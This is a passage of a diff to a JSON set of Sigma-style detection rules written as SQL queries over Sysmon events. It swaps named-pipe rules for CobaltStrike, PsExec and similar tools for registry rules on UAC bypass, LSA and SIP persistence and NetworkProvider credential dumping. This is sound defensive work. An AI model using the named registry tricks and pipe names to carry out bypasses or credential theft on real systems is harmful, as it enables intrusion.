'%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", 
- "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": 
"Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in 
CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE 
'\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects 
creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE 
'\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName 
REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - 
"Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' 
ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": 
